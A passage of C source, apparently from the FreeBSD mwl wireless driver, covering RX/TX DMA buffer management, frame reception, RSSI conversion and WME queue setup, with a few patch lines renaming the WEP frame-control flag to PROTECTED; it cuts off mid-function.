*/ if (mwl_rxbuf < 2*mwl_rxdesc) { if_printf(ifp, "too few rx dma buffers (%d); increasing to %d\n", mwl_rxbuf, 2*mwl_rxdesc); mwl_rxbuf = 2*mwl_rxdesc; } jumbosize = roundup(MWL_AGGR_SIZE, PAGE_SIZE); sc->sc_rxmemsize = mwl_rxbuf*jumbosize; error = bus_dma_tag_create(sc->sc_dmat, /* parent */ PAGE_SIZE, 0, /* alignment, bounds */ BUS_SPACE_MAXADDR_32BIT, /* lowaddr */ BUS_SPACE_MAXADDR, /* highaddr */ NULL, NULL, /* filter, filterarg */ sc->sc_rxmemsize, /* maxsize */ 1, /* nsegments */ sc->sc_rxmemsize, /* maxsegsize */ BUS_DMA_ALLOCNOW, /* flags */ NULL, /* lockfunc */ NULL, /* lockarg */ &sc->sc_rxdmat); error = bus_dmamap_create(sc->sc_rxdmat, BUS_DMA_NOWAIT, &sc->sc_rxmap); if (error != 0) { if_printf(ifp, "could not create rx DMA map\n"); return error; } error = bus_dmamem_alloc(sc->sc_rxdmat, (void**) &sc->sc_rxmem, BUS_DMA_NOWAIT | BUS_DMA_COHERENT, &sc->sc_rxmap); if (error != 0) { if_printf(ifp, "could not alloc %ju bytes of rx DMA memory\n", (uintmax_t) sc->sc_rxmemsize); return error; } error = bus_dmamap_load(sc->sc_rxdmat, sc->sc_rxmap, sc->sc_rxmem, sc->sc_rxmemsize, mwl_load_cb, &sc->sc_rxmem_paddr, BUS_DMA_NOWAIT); if (error != 0) { if_printf(ifp, "could not load rx DMA map\n"); return error; } /* * Allocate rx buffers and set them up. */ bsize = mwl_rxdesc * sizeof(struct mwl_rxbuf); bf = malloc(bsize, M_MWLDEV, M_NOWAIT | M_ZERO); if (bf == NULL) { if_printf(ifp, "malloc of %u rx buffers failed\n", bsize); return error; } sc->sc_rxdma.dd_bufptr = bf; STAILQ_INIT(&sc->sc_rxbuf); ds = sc->sc_rxdma.dd_desc; for (i = 0; i < mwl_rxdesc; i++, bf++, ds++) { bf->bf_desc = ds; bf->bf_daddr = DS2PHYS(&sc->sc_rxdma, ds); /* pre-assign dma buffer */ bf->bf_data = ((uint8_t *)sc->sc_rxmem) + (i*jumbosize); /* NB: tail is intentional to preserve descriptor order */ STAILQ_INSERT_TAIL(&sc->sc_rxbuf, bf, bf_list); } /* * Place remainder of dma memory buffers on the free list. 
*/ SLIST_INIT(&sc->sc_rxfree); for (; i < mwl_rxbuf; i++) { data = ((uint8_t *)sc->sc_rxmem) + (i*jumbosize); rbuf = MWL_JUMBO_DATA2BUF(data); SLIST_INSERT_HEAD(&sc->sc_rxfree, rbuf, next); sc->sc_nrxfree++; } return 0; } #undef DS2PHYS static void mwl_rxdma_cleanup(struct mwl_softc *sc) { if (sc->sc_rxmap != NULL) bus_dmamap_unload(sc->sc_rxdmat, sc->sc_rxmap); if (sc->sc_rxmem != NULL) { bus_dmamem_free(sc->sc_rxdmat, sc->sc_rxmem, sc->sc_rxmap); sc->sc_rxmem = NULL; } if (sc->sc_rxmap != NULL) { bus_dmamap_destroy(sc->sc_rxdmat, sc->sc_rxmap); sc->sc_rxmap = NULL; } if (sc->sc_rxdma.dd_bufptr != NULL) { free(sc->sc_rxdma.dd_bufptr, M_MWLDEV); sc->sc_rxdma.dd_bufptr = NULL; } if (sc->sc_rxdma.dd_desc_len != 0) mwl_desc_cleanup(sc, &sc->sc_rxdma); } static int mwl_dma_setup(struct mwl_softc *sc) { int error, i; error = mwl_rxdma_setup(sc); if (error != 0) { mwl_rxdma_cleanup(sc); return error; } for (i = 0; i < MWL_NUM_TX_QUEUES; i++) { error = mwl_txdma_setup(sc, &sc->sc_txq[i]); if (error != 0) { mwl_dma_cleanup(sc); return error; } } return 0; } static void mwl_dma_cleanup(struct mwl_softc *sc) { int i; for (i = 0; i < MWL_NUM_TX_QUEUES; i++) mwl_txdma_cleanup(sc, &sc->sc_txq[i]); mwl_rxdma_cleanup(sc); } static struct ieee80211_node * mwl_node_alloc(struct ieee80211vap *vap, const uint8_t mac[IEEE80211_ADDR_LEN]) { struct ieee80211com *ic = vap->iv_ic; struct mwl_softc *sc = ic->ic_ifp->if_softc; const size_t space = sizeof(struct mwl_node); struct mwl_node *mn; mn = malloc(space, M_80211_NODE, M_NOWAIT|M_ZERO); if (mn == NULL) { /* XXX stat+msg */ return NULL; } DPRINTF(sc, MWL_DEBUG_NODE, "%s: mn %p\n", __func__, mn); return &mn->mn_node; } static void mwl_node_cleanup(struct ieee80211_node *ni) { struct ieee80211com *ic = ni->ni_ic; struct mwl_softc *sc = ic->ic_ifp->if_softc; struct mwl_node *mn = MWL_NODE(ni); DPRINTF(sc, MWL_DEBUG_NODE, "%s: ni %p ic %p staid %d\n", __func__, ni, ni->ni_ic, mn->mn_staid); if (mn->mn_staid != 0) { struct ieee80211vap *vap = ni->ni_vap; if (mn->mn_hvap != NULL) { if (vap->iv_opmode == IEEE80211_M_STA) mwl_hal_delstation(mn->mn_hvap, vap->iv_myaddr); else mwl_hal_delstation(mn->mn_hvap, ni->ni_macaddr); } /* * NB: legacy WDS peer sta db entry is installed using * the associate ap's hvap; use it again to delete it. * XXX can vap be NULL? */ else if (vap->iv_opmode == IEEE80211_M_WDS && MWL_VAP(vap)->mv_ap_hvap != NULL) mwl_hal_delstation(MWL_VAP(vap)->mv_ap_hvap, ni->ni_macaddr); delstaid(sc, mn->mn_staid); mn->mn_staid = 0; } sc->sc_node_cleanup(ni); } /* * Reclaim rx dma buffers from packets sitting on the ampdu * reorder queue for a station. We replace buffers with a * system cluster (if available). */ static void mwl_ampdu_rxdma_reclaim(struct ieee80211_rx_ampdu *rap) { #if 0 int i, n, off; struct mbuf *m; void *cl; n = rap->rxa_qframes; for (i = 0; i < rap->rxa_wnd && n > 0; i++) { m = rap->rxa_m[i]; if (m == NULL) continue; n--; /* our dma buffers have a well-known free routine */ if ((m->m_flags & M_EXT) == 0 || m->m_ext.ext_free != mwl_ext_free) continue; /* * Try to allocate a cluster and move the data. */ off = m->m_data - m->m_ext.ext_buf; if (off + m->m_pkthdr.len > MCLBYTES) { /* XXX no AMSDU for now */ continue; } cl = pool_cache_get_paddr(&mclpool_cache, 0, &m->m_ext.ext_paddr); if (cl != NULL) { /* * Copy the existing data to the cluster, remove * the rx dma buffer, and attach the cluster in * its place. Note we preserve the offset to the * data so frames being bridged can still prepend * their headers without adding another mbuf. 
*/ memcpy((caddr_t) cl + off, m->m_data, m->m_pkthdr.len); MEXTREMOVE(m); MEXTADD(m, cl, MCLBYTES, 0, NULL, &mclpool_cache); /* setup mbuf like _MCLGET does */ m->m_flags |= M_CLUSTER | M_EXT_RW; _MOWNERREF(m, M_EXT | M_CLUSTER); /* NB: m_data is clobbered by MEXTADDR, adjust */ m->m_data += off; } } #endif } /* * Callback to reclaim resources. We first let the * net80211 layer do it's thing, then if we are still * blocked by a lack of rx dma buffers we walk the ampdu * reorder q's to reclaim buffers by copying to a system * cluster. */ static void mwl_node_drain(struct ieee80211_node *ni) { struct ieee80211com *ic = ni->ni_ic; struct mwl_softc *sc = ic->ic_ifp->if_softc; struct mwl_node *mn = MWL_NODE(ni); DPRINTF(sc, MWL_DEBUG_NODE, "%s: ni %p vap %p staid %d\n", __func__, ni, ni->ni_vap, mn->mn_staid); /* NB: call up first to age out ampdu q's */ sc->sc_node_drain(ni); /* XXX better to not check low water mark? */ if (sc->sc_rxblocked && mn->mn_staid != 0 && (ni->ni_flags & IEEE80211_NODE_HT)) { uint8_t tid; /* * Walk the reorder q and reclaim rx dma buffers by copying * the packet contents into clusters. */ for (tid = 0; tid < WME_NUM_TID; tid++) { struct ieee80211_rx_ampdu *rap; rap = &ni->ni_rx_ampdu[tid]; if ((rap->rxa_flags & IEEE80211_AGGR_XCHGPEND) == 0) continue; if (rap->rxa_qframes) mwl_ampdu_rxdma_reclaim(rap); } } } static void mwl_node_getsignal(const struct ieee80211_node *ni, int8_t *rssi, int8_t *noise) { *rssi = ni->ni_ic->ic_node_getrssi(ni); #ifdef MWL_ANT_INFO_SUPPORT #if 0 /* XXX need to smooth data */ *noise = -MWL_NODE_CONST(ni)->mn_ai.nf; #else *noise = -95; /* XXX */ #endif #else *noise = -95; /* XXX */ #endif } /* * Convert Hardware per-antenna rssi info to common format: * Let a1, a2, a3 represent the amplitudes per chain * Let amax represent max[a1, a2, a3] * Rssi1_dBm = RSSI_dBm + 20*log10(a1/amax) * Rssi1_dBm = RSSI_dBm + 20*log10(a1) - 20*log10(amax) * We store a table that is 4*20*log10(idx) - the extra 4 is to store or * maintain some extra precision. * * Values are stored in .5 db format capped at 127. */ static void mwl_node_getmimoinfo(const struct ieee80211_node *ni, struct ieee80211_mimo_info *mi) { #define CVT(_dst, _src) do { \ (_dst) = rssi + ((logdbtbl[_src] - logdbtbl[rssi_max]) >> 2); \ (_dst) = (_dst) > 64 ? 127 : ((_dst) << 1); \ } while (0) static const int8_t logdbtbl[32] = { 0, 0, 24, 38, 48, 56, 62, 68, 72, 76, 80, 83, 86, 89, 92, 94, 96, 98, 100, 102, 104, 106, 107, 109, 110, 112, 113, 115, 116, 117, 118, 119 }; const struct mwl_node *mn = MWL_NODE_CONST(ni); uint8_t rssi = mn->mn_ai.rsvd1/2; /* XXX */ uint32_t rssi_max; rssi_max = mn->mn_ai.rssi_a; if (mn->mn_ai.rssi_b > rssi_max) rssi_max = mn->mn_ai.rssi_b; if (mn->mn_ai.rssi_c > rssi_max) rssi_max = mn->mn_ai.rssi_c; CVT(mi->rssi[0], mn->mn_ai.rssi_a); CVT(mi->rssi[1], mn->mn_ai.rssi_b); CVT(mi->rssi[2], mn->mn_ai.rssi_c); mi->noise[0] = mn->mn_ai.nf_a; mi->noise[1] = mn->mn_ai.nf_b; mi->noise[2] = mn->mn_ai.nf_c; #undef CVT } static __inline void * mwl_getrxdma(struct mwl_softc *sc) { struct mwl_jumbo *buf; void *data; /* * Allocate from jumbo pool. 
*/ MWL_RXFREE_LOCK(sc); buf = SLIST_FIRST(&sc->sc_rxfree); if (buf == NULL) { DPRINTF(sc, MWL_DEBUG_ANY, "%s: out of rx dma buffers\n", __func__); sc->sc_stats.mst_rx_nodmabuf++; data = NULL; } else { SLIST_REMOVE_HEAD(&sc->sc_rxfree, next); sc->sc_nrxfree--; data = MWL_JUMBO_BUF2DATA(buf); } MWL_RXFREE_UNLOCK(sc); return data; } static __inline void mwl_putrxdma(struct mwl_softc *sc, void *data) { struct mwl_jumbo *buf; /* XXX bounds check data */ MWL_RXFREE_LOCK(sc); buf = MWL_JUMBO_DATA2BUF(data); SLIST_INSERT_HEAD(&sc->sc_rxfree, buf, next); sc->sc_nrxfree++; MWL_RXFREE_UNLOCK(sc); } static int mwl_rxbuf_init(struct mwl_softc *sc, struct mwl_rxbuf *bf) { struct mwl_rxdesc *ds; ds = bf->bf_desc; if (bf->bf_data == NULL) { bf->bf_data = mwl_getrxdma(sc); if (bf->bf_data == NULL) { /* mark descriptor to be skipped */ ds->RxControl = EAGLE_RXD_CTRL_OS_OWN; /* NB: don't need PREREAD */ MWL_RXDESC_SYNC(sc, ds, BUS_DMASYNC_PREWRITE); sc->sc_stats.mst_rxbuf_failed++; return ENOMEM; } } /* * NB: DMA buffer contents is known to be unmodified * so there's no need to flush the data cache. */ /* * Setup descriptor. */ ds->QosCtrl = 0; ds->RSSI = 0; ds->Status = EAGLE_RXD_STATUS_IDLE; ds->Channel = 0; ds->PktLen = htole16(MWL_AGGR_SIZE); ds->SQ2 = 0; ds->pPhysBuffData = htole32(MWL_JUMBO_DMA_ADDR(sc, bf->bf_data)); /* NB: don't touch pPhysNext, set once */ ds->RxControl = EAGLE_RXD_CTRL_DRIVER_OWN; MWL_RXDESC_SYNC(sc, ds, BUS_DMASYNC_PREREAD | BUS_DMASYNC_PREWRITE); return 0; } static int mwl_ext_free(struct mbuf *m, void *data, void *arg) { struct mwl_softc *sc = arg; /* XXX bounds check data */ mwl_putrxdma(sc, data); /* * If we were previously blocked by a lack of rx dma buffers * check if we now have enough to restart rx interrupt handling. * NB: we know we are called at splvm which is above splnet. */ if (sc->sc_rxblocked && sc->sc_nrxfree > mwl_rxdmalow) { sc->sc_rxblocked = 0; mwl_hal_intrset(sc->sc_mh, sc->sc_imask); } return (EXT_FREE_OK); } struct mwl_frame_bar { u_int8_t i_fc[2]; u_int8_t i_dur[2]; u_int8_t i_ra[IEEE80211_ADDR_LEN]; u_int8_t i_ta[IEEE80211_ADDR_LEN]; /* ctl, seq, FCS */ } __packed; /* * Like ieee80211_anyhdrsize, but handles BAR frames * specially so the logic below to piece the 802.11 * header together works. */ static __inline int mwl_anyhdrsize(const void *data) { const struct ieee80211_frame *wh = data; if ((wh->i_fc[0]&IEEE80211_FC0_TYPE_MASK) == IEEE80211_FC0_TYPE_CTL) { switch (wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK) { case IEEE80211_FC0_SUBTYPE_CTS: case IEEE80211_FC0_SUBTYPE_ACK: return sizeof(struct ieee80211_frame_ack); case IEEE80211_FC0_SUBTYPE_BAR: return sizeof(struct mwl_frame_bar); } return sizeof(struct ieee80211_frame_min); } else return ieee80211_hdrsize(data); } static void mwl_handlemicerror(struct ieee80211com *ic, const uint8_t *data) { const struct ieee80211_frame *wh; struct ieee80211_node *ni; wh = (const struct ieee80211_frame *)(data + sizeof(uint16_t)); ni = ieee80211_find_rxnode(ic, (const struct ieee80211_frame_min *) wh); if (ni != NULL) { ieee80211_notify_michael_failure(ni->ni_vap, wh, 0); ieee80211_free_node(ni); } } /* * Convert hardware signal strength to rssi. The value * provided by the device has the noise floor added in; * we need to compensate for this but we don't have that * so we use a fixed value. * * The offset of 8 is good for both 2.4 and 5GHz. The LNA * offset is already set as part of the initial gain. This * will give at least +/- 3dB for 2.4GHz and +/- 5dB for 5GHz. 
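 *
 * Worked example of the conversion below (input value chosen only for
 * illustration): a reported ssi of 55 gives
 *
 *	rssi   = 55 + 8 = 63
 *	result = 2 * (87 - 63) = 48	(i.e. 24 in whole dB)
 *
 * and results are clamped to the 0..127 range expected by net80211.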
*/ static __inline int cvtrssi(uint8_t ssi) { int rssi = (int) ssi + 8; /* XXX hack guess until we have a real noise floor */ rssi = 2*(87 - rssi); /* NB: .5 dBm units */ return (rssi < 0 ? 0 : rssi > 127 ? 127 : rssi); } static void mwl_rx_proc(void *arg, int npending) { #define IEEE80211_DIR_DSTODS(wh) \ ((((const struct ieee80211_frame *)wh)->i_fc[1] & IEEE80211_FC1_DIR_MASK) == IEEE80211_FC1_DIR_DSTODS) struct mwl_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct mwl_rxbuf *bf; struct mwl_rxdesc *ds; struct mbuf *m; struct ieee80211_qosframe *wh; struct ieee80211_qosframe_addr4 *wh4; struct ieee80211_node *ni; struct mwl_node *mn; int off, len, hdrlen, pktlen, rssi, ntodo; uint8_t *data, status; void *newdata; int16_t nf; DPRINTF(sc, MWL_DEBUG_RX_PROC, "%s: pending %u rdptr 0x%x wrptr 0x%x\n", __func__, npending, RD4(sc, sc->sc_hwspecs.rxDescRead), RD4(sc, sc->sc_hwspecs.rxDescWrite)); nf = -96; /* XXX */ bf = sc->sc_rxnext; for (ntodo = mwl_rxquota; ntodo > 0; ntodo--) { if (bf == NULL) bf = STAILQ_FIRST(&sc->sc_rxbuf); ds = bf->bf_desc; data = bf->bf_data; if (data == NULL) { /* * If data allocation failed previously there * will be no buffer; try again to re-populate it. * Note the firmware will not advance to the next * descriptor with a dma buffer so we must mimic * this or we'll get out of sync. */ DPRINTF(sc, MWL_DEBUG_ANY, "%s: rx buf w/o dma memory\n", __func__); (void) mwl_rxbuf_init(sc, bf); sc->sc_stats.mst_rx_dmabufmissing++; break; } MWL_RXDESC_SYNC(sc, ds, BUS_DMASYNC_POSTREAD | BUS_DMASYNC_POSTWRITE); if (ds->RxControl != EAGLE_RXD_CTRL_DMA_OWN) break; #ifdef MWL_DEBUG if (sc->sc_debug & MWL_DEBUG_RECV_DESC) mwl_printrxbuf(bf, 0); #endif status = ds->Status; if (status & EAGLE_RXD_STATUS_DECRYPT_ERR_MASK) { ifp->if_ierrors++; sc->sc_stats.mst_rx_crypto++; /* * NB: Check EAGLE_RXD_STATUS_GENERAL_DECRYPT_ERR * for backwards compatibility. */ if (status != EAGLE_RXD_STATUS_GENERAL_DECRYPT_ERR && (status & EAGLE_RXD_STATUS_TKIP_MIC_DECRYPT_ERR)) { /* * MIC error, notify upper layers. */ bus_dmamap_sync(sc->sc_rxdmat, sc->sc_rxmap, BUS_DMASYNC_POSTREAD); mwl_handlemicerror(ic, data); sc->sc_stats.mst_rx_tkipmic++; } /* XXX too painful to tap packets */ goto rx_next; } /* * Sync the data buffer. */ len = le16toh(ds->PktLen); bus_dmamap_sync(sc->sc_rxdmat, sc->sc_rxmap, BUS_DMASYNC_POSTREAD); /* * The 802.11 header is provided all or in part at the front; * use it to calculate the true size of the header that we'll * construct below. We use this to figure out where to copy * payload prior to constructing the header. */ hdrlen = mwl_anyhdrsize(data + sizeof(uint16_t)); off = sizeof(uint16_t) + sizeof(struct ieee80211_frame_addr4); /* calculate rssi early so we can re-use for each aggregate */ rssi = cvtrssi(ds->RSSI); pktlen = hdrlen + (len - off); /* * NB: we know our frame is at least as large as * IEEE80211_MIN_LEN because there is a 4-address * frame at the front. Hence there's no need to * vet the packet length. If the frame in fact * is too small it should be discarded at the * net80211 layer. */ /* * Attach dma buffer to an mbuf. We tried * doing this based on the packet size (i.e. * copying small packets) but it turns out to * be a net loss. The tradeoff might be system * dependent (cache architecture is important). 
*/ MGETHDR(m, M_NOWAIT, MT_DATA); if (m == NULL) { DPRINTF(sc, MWL_DEBUG_ANY, "%s: no rx mbuf\n", __func__); sc->sc_stats.mst_rx_nombuf++; goto rx_next; } /* * Acquire the replacement dma buffer before * processing the frame. If we're out of dma * buffers we disable rx interrupts and wait * for the free pool to reach mlw_rxdmalow buffers * before starting to do work again. If the firmware * runs out of descriptors then it will toss frames * which is better than our doing it as that can * starve our processing. It is also important that * we always process rx'd frames in case they are * A-MPDU as otherwise the host's view of the BA * window may get out of sync with the firmware. */ newdata = mwl_getrxdma(sc); if (newdata == NULL) { /* NB: stat+msg in mwl_getrxdma */ m_free(m); /* disable RX interrupt and mark state */ mwl_hal_intrset(sc->sc_mh, sc->sc_imask &~ MACREG_A2HRIC_BIT_RX_RDY); sc->sc_rxblocked = 1; ieee80211_drain(ic); /* XXX check rxblocked and immediately start again? */ goto rx_stop; } bf->bf_data = newdata; /* * Attach the dma buffer to the mbuf; * mwl_rxbuf_init will re-setup the rx * descriptor using the replacement dma * buffer we just installed above. */ MEXTADD(m, data, MWL_AGGR_SIZE, mwl_ext_free, data, sc, 0, EXT_NET_DRV); m->m_data += off - hdrlen; m->m_pkthdr.len = m->m_len = pktlen; m->m_pkthdr.rcvif = ifp; /* NB: dma buffer assumed read-only */ /* * Piece 802.11 header together. */ wh = mtod(m, struct ieee80211_qosframe *); /* NB: don't need to do this sometimes but ... */ /* XXX special case so we can memcpy after m_devget? */ ovbcopy(data + sizeof(uint16_t), wh, hdrlen); if (IEEE80211_QOS_HAS_SEQ(wh)) { if (IEEE80211_DIR_DSTODS(wh)) { wh4 = mtod(m, struct ieee80211_qosframe_addr4*); *(uint16_t *)wh4->i_qos = ds->QosCtrl; } else { *(uint16_t *)wh->i_qos = ds->QosCtrl; } } /* * The f/w strips WEP header but doesn't clear * the WEP bit; mark the packet with M_WEP so * net80211 will treat the data as decrypted. * While here also clear the PWR_MGT bit since * power save is handled by the firmware and * passing this up will potentially cause the * upper layer to put a station in power save * (except when configured with MWL_HOST_PS_SUPPORT). 
*/ - if (wh->i_fc[1] & IEEE80211_FC1_WEP) + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) m->m_flags |= M_WEP; #ifdef MWL_HOST_PS_SUPPORT - wh->i_fc[1] &= ~IEEE80211_FC1_WEP; + wh->i_fc[1] &= ~IEEE80211_FC1_PROTECTED; #else - wh->i_fc[1] &= ~(IEEE80211_FC1_WEP | IEEE80211_FC1_PWR_MGT); + wh->i_fc[1] &= ~(IEEE80211_FC1_PROTECTED | + IEEE80211_FC1_PWR_MGT); #endif if (ieee80211_radiotap_active(ic)) { struct mwl_rx_radiotap_header *tap = &sc->sc_rx_th; tap->wr_flags = 0; tap->wr_rate = ds->Rate; tap->wr_antsignal = rssi + nf; tap->wr_antnoise = nf; } if (IFF_DUMPPKTS_RECV(sc, wh)) { ieee80211_dump_pkt(ic, mtod(m, caddr_t), len, ds->Rate, rssi); } ifp->if_ipackets++; /* dispatch */ ni = ieee80211_find_rxnode(ic, (const struct ieee80211_frame_min *) wh); if (ni != NULL) { mn = MWL_NODE(ni); #ifdef MWL_ANT_INFO_SUPPORT mn->mn_ai.rssi_a = ds->ai.rssi_a; mn->mn_ai.rssi_b = ds->ai.rssi_b; mn->mn_ai.rssi_c = ds->ai.rssi_c; mn->mn_ai.rsvd1 = rssi; #endif /* tag AMPDU aggregates for reorder processing */ if (ni->ni_flags & IEEE80211_NODE_HT) m->m_flags |= M_AMPDU; (void) ieee80211_input(ni, m, rssi, nf); ieee80211_free_node(ni); } else (void) ieee80211_input_all(ic, m, rssi, nf); rx_next: /* NB: ignore ENOMEM so we process more descriptors */ (void) mwl_rxbuf_init(sc, bf); bf = STAILQ_NEXT(bf, bf_list); } rx_stop: sc->sc_rxnext = bf; if ((ifp->if_drv_flags & IFF_DRV_OACTIVE) == 0 && !IFQ_IS_EMPTY(&ifp->if_snd)) { /* NB: kick fw; the tx thread may have been preempted */ mwl_hal_txstart(sc->sc_mh, 0); mwl_start(ifp); } #undef IEEE80211_DIR_DSTODS } static void mwl_txq_init(struct mwl_softc *sc, struct mwl_txq *txq, int qnum) { struct mwl_txbuf *bf, *bn; struct mwl_txdesc *ds; MWL_TXQ_LOCK_INIT(sc, txq); txq->qnum = qnum; txq->txpri = 0; /* XXX */ #if 0 /* NB: q setup by mwl_txdma_setup XXX */ STAILQ_INIT(&txq->free); #endif STAILQ_FOREACH(bf, &txq->free, bf_list) { bf->bf_txq = txq; ds = bf->bf_desc; bn = STAILQ_NEXT(bf, bf_list); if (bn == NULL) bn = STAILQ_FIRST(&txq->free); ds->pPhysNext = htole32(bn->bf_daddr); } STAILQ_INIT(&txq->active); } /* * Setup a hardware data transmit queue for the specified * access control. We record the mapping from ac's * to h/w queues for use by mwl_tx_start. */ static int mwl_tx_setup(struct mwl_softc *sc, int ac, int mvtype) { #define N(a) (sizeof(a)/sizeof(a[0])) struct mwl_txq *txq; if (ac >= N(sc->sc_ac2q)) { device_printf(sc->sc_dev, "AC %u out of range, max %zu!\n", ac, N(sc->sc_ac2q)); return 0; } if (mvtype >= MWL_NUM_TX_QUEUES) { device_printf(sc->sc_dev, "mvtype %u out of range, max %u!\n", mvtype, MWL_NUM_TX_QUEUES); return 0; } txq = &sc->sc_txq[mvtype]; mwl_txq_init(sc, txq, mvtype); sc->sc_ac2q[ac] = txq; return 1; #undef N } /* * Update WME parameters for a transmit queue. 
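 *
 * For illustration only (assumed WME parameter values): with
 * wmep_logcwmin = 4 and wmep_logcwmax = 10 the routine below hands
 * cwmin = (1<<4)-1 = 15 and cwmax = (1<<10)-1 = 1023 to
 * mwl_hal_setedcaparams; the TXOP limit is passed through unchanged
 * in units of 32us.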
*/ static int mwl_txq_update(struct mwl_softc *sc, int ac) { #define MWL_EXPONENT_TO_VALUE(v) ((1<<v)-1) struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct mwl_txq *txq = sc->sc_ac2q[ac]; struct wmeParams *wmep = &ic->ic_wme.wme_chanParams.cap_wmeParams[ac]; struct mwl_hal *mh = sc->sc_mh; int aifs, cwmin, cwmax, txoplim; aifs = wmep->wmep_aifsn; /* XXX in sta mode need to pass log values for cwmin/max */ cwmin = MWL_EXPONENT_TO_VALUE(wmep->wmep_logcwmin); cwmax = MWL_EXPONENT_TO_VALUE(wmep->wmep_logcwmax); txoplim = wmep->wmep_txopLimit; /* NB: units of 32us */ if (mwl_hal_setedcaparams(mh, txq->qnum, cwmin, cwmax, aifs, txoplim)) { device_printf(sc->sc_dev, "unable to update hardware queue " "parameters for %s traffic!\n", ieee80211_wme_acnames[ac]); return 0; } return 1; #undef MWL_EXPONENT_TO_VALUE } /* * Callback from the 802.11 layer to update WME parameters. */ static int mwl_wme_update(struct ieee80211com *ic) { struct mwl_softc *sc = ic->ic_ifp->if_softc; return !mwl_txq_update(sc, WME_AC_BE) || !mwl_txq_update(sc, WME_AC_BK) || !mwl_txq_update(sc, WME_AC_VI) || !mwl_txq_update(sc, WME_AC_VO) ? EIO : 0; } /* * Reclaim resources for a setup queue. */ static void mwl_tx_cleanupq(struct mwl_softc *sc, struct mwl_txq *txq) { /* XXX hal work? */ MWL_TXQ_LOCK_DESTROY(txq); } /* * Reclaim all tx queue resources. */ static void mwl_tx_cleanup(struct mwl_softc *sc) { int i; for (i = 0; i < MWL_NUM_TX_QUEUES; i++) mwl_tx_cleanupq(sc, &sc->sc_txq[i]); } static int mwl_tx_dmasetup(struct mwl_softc *sc, struct mwl_txbuf *bf, struct mbuf *m0) { struct mbuf *m; int error; /* * Load the DMA map so any coalescing is done. This * also calculates the number of descriptors we need. */ error = bus_dmamap_load_mbuf_sg(sc->sc_dmat, bf->bf_dmamap, m0, bf->bf_segs, &bf->bf_nseg, BUS_DMA_NOWAIT); if (error == EFBIG) { /* XXX packet requires too many descriptors */ bf->bf_nseg = MWL_TXDESC+1; } else if (error != 0) { sc->sc_stats.mst_tx_busdma++; m_freem(m0); return error; } /* * Discard null packets and check for packets that * require too many TX descriptors. We try to convert * the latter to a cluster. */ if (error == EFBIG) { /* too many desc's, linearize */ sc->sc_stats.mst_tx_linear++; #if MWL_TXDESC > 1 m = m_collapse(m0, M_NOWAIT, MWL_TXDESC); #else m = m_defrag(m0, M_NOWAIT); #endif if (m == NULL) { m_freem(m0); sc->sc_stats.mst_tx_nombuf++; return ENOMEM; } m0 = m; error = bus_dmamap_load_mbuf_sg(sc->sc_dmat, bf->bf_dmamap, m0, bf->bf_segs, &bf->bf_nseg, BUS_DMA_NOWAIT); if (error != 0) { sc->sc_stats.mst_tx_busdma++; m_freem(m0); return error; } KASSERT(bf->bf_nseg <= MWL_TXDESC, ("too many segments after defrag; nseg %u", bf->bf_nseg)); } else if (bf->bf_nseg == 0) { /* null packet, discard */ sc->sc_stats.mst_tx_nodata++; m_freem(m0); return EIO; } DPRINTF(sc, MWL_DEBUG_XMIT, "%s: m %p len %u\n", __func__, m0, m0->m_pkthdr.len); bus_dmamap_sync(sc->sc_dmat, bf->bf_dmamap, BUS_DMASYNC_PREWRITE); bf->bf_m = m0; return 0; } static __inline int mwl_cvtlegacyrate(int rate) { switch (rate) { case 2: return 0; case 4: return 1; case 11: return 2; case 22: return 3; case 44: return 4; case 12: return 5; case 18: return 6; case 24: return 7; case 36: return 8; case 48: return 9; case 72: return 10; case 96: return 11; case 108:return 12; } return 0; } /* * Calculate fixed tx rate information per client state; * this value is suitable for writing to the Format field * of a tx descriptor.
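 *
 * For illustration only (assumed fixed-rate setting): a legacy
 * ucastrate of 108 (54 Mb/s in 500 kb/s units) maps through
 * mwl_cvtlegacyrate() above to hardware rate index 12; rate codes
 * not listed there fall back to index 0 (1 Mb/s).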
*/ static uint16_t mwl_calcformat(uint8_t rate, const struct ieee80211_node *ni) { uint16_t fmt; fmt = SM(3, EAGLE_TXD_ANTENNA) | (IEEE80211_IS_CHAN_HT40D(ni->ni_chan) ? EAGLE_TXD_EXTCHAN_LO : EAGLE_TXD_EXTCHAN_HI); if (rate & IEEE80211_RATE_MCS) { /* HT MCS */ fmt |= EAGLE_TXD_FORMAT_HT /* NB: 0x80 implicitly stripped from ucastrate */ | SM(rate, EAGLE_TXD_RATE); /* XXX short/long GI may be wrong; re-check */ if (IEEE80211_IS_CHAN_HT40(ni->ni_chan)) { fmt |= EAGLE_TXD_CHW_40 | (ni->ni_htcap & IEEE80211_HTCAP_SHORTGI40 ? EAGLE_TXD_GI_SHORT : EAGLE_TXD_GI_LONG); } else { fmt |= EAGLE_TXD_CHW_20 | (ni->ni_htcap & IEEE80211_HTCAP_SHORTGI20 ? EAGLE_TXD_GI_SHORT : EAGLE_TXD_GI_LONG); } } else { /* legacy rate */ fmt |= EAGLE_TXD_FORMAT_LEGACY | SM(mwl_cvtlegacyrate(rate), EAGLE_TXD_RATE) | EAGLE_TXD_CHW_20 /* XXX iv_flags & IEEE80211_F_SHPREAMBLE? */ | (ni->ni_capinfo & IEEE80211_CAPINFO_SHORT_PREAMBLE ? EAGLE_TXD_PREAMBLE_SHORT : EAGLE_TXD_PREAMBLE_LONG); } return fmt; } static int mwl_tx_start(struct mwl_softc *sc, struct ieee80211_node *ni, struct mwl_txbuf *bf, struct mbuf *m0) { #define IEEE80211_DIR_DSTODS(wh) \ ((wh->i_fc[1] & IEEE80211_FC1_DIR_MASK) == IEEE80211_FC1_DIR_DSTODS) struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = ni->ni_vap; int error, iswep, ismcast; int hdrlen, copyhdrlen, pktlen; struct mwl_txdesc *ds; struct mwl_txq *txq; struct ieee80211_frame *wh; struct mwltxrec *tr; struct mwl_node *mn; uint16_t qos; #if MWL_TXDESC > 1 int i; #endif wh = mtod(m0, struct ieee80211_frame *); - iswep = wh->i_fc[1] & IEEE80211_FC1_WEP; + iswep = wh->i_fc[1] & IEEE80211_FC1_PROTECTED; ismcast = IEEE80211_IS_MULTICAST(wh->i_addr1); hdrlen = ieee80211_anyhdrsize(wh); copyhdrlen = hdrlen; pktlen = 